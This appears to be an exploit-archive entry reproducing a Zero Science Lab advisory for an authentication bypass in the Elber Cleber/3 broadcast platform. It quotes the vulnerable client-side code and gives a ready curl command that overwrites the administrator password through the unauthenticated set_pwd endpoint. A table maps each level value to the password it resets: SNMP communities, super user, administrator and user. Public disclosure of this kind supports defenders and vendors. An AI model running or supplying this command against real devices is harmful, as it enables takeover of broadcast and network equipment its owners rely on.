b8a68091fe
7 changes to exploits/shellcodes/ghdb Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Authentication Bypass Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Device Config Disclosure
73 lines
No EOL
2.5 KiB
Text
73 lines
No EOL
2.5 KiB
Text
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass
|
|
|
|
|
|
Vendor: Elber S.r.l.
|
|
Product web page: https://www.elber.it
|
|
Affected version: 1.0.0 Revision 7304
|
|
1.0.0 Revision 7284
|
|
1.0.0 Revision 6505
|
|
1.0.0 Revision 6332
|
|
1.0.0 Revision 6258
|
|
XS2DAB v1.50 rev 6267
|
|
|
|
Summary: Cleber offers a powerful, flexible and modular hardware and
|
|
software platform for broadcasting and contribution networks where
|
|
customers can install up to six boards with no limitations in terms
|
|
of position or number. Based on a Linux embedded OS, it detects the
|
|
presence of the boards and shows the related control interface to the
|
|
user, either through web GUI and Touchscreen TFT display. Power supply
|
|
can be single (AC and/or DC) or dual (hot swappable for redundancy);
|
|
customer may chose between two ranges for DC sources, that is 22-65
|
|
or 10-36 Vdc for site or DSNG applications.
|
|
|
|
Desc: The device suffers from an authentication bypass vulnerability through
|
|
a direct and unauthorized access to the password management functionality. The
|
|
issue allows attackers to bypass authentication by manipulating the set_pwd
|
|
endpoint that enables them to overwrite the password of any user within the
|
|
system. This grants unauthorized and administrative access to protected areas
|
|
of the application compromising the device's system security.
|
|
|
|
--------------------------------------------------------------------------
|
|
/modules/pwd.html
|
|
------------------
|
|
50: function apply_pwd(level, pwd)
|
|
51: {
|
|
52: $.get("json_data/set_pwd", {lev:level, pass:pwd},
|
|
53: function(data){
|
|
54: //$.alert({title:'Operation',text:data});
|
|
55: show_message(data);
|
|
56: }).fail(function(error){
|
|
57: show_message('Error ' + error.status, 'error');
|
|
58: });
|
|
59: }
|
|
|
|
--------------------------------------------------------------------------
|
|
|
|
Tested on: NBFM Controller
|
|
embOS/IP
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2024-5816
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5816.php
|
|
|
|
|
|
18.08.2023
|
|
|
|
--
|
|
|
|
|
|
$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
|
|
|
|
Ref (lev param):
|
|
|
|
Level 7 = SNMP Write Community (snmp_write_pwd)
|
|
Level 6 = SNMP Read Community (snmp_read_pwd)
|
|
Level 5 = Custom Password? hidden. (custom_pwd)
|
|
Level 4 = Display Password (display_pwd)?
|
|
Level 2 = Administrator Password (admin_pwd)
|
|
Level 1 = Super User Password (puser_pwd)
|
|
Level 0 = User Password (user_pwd) |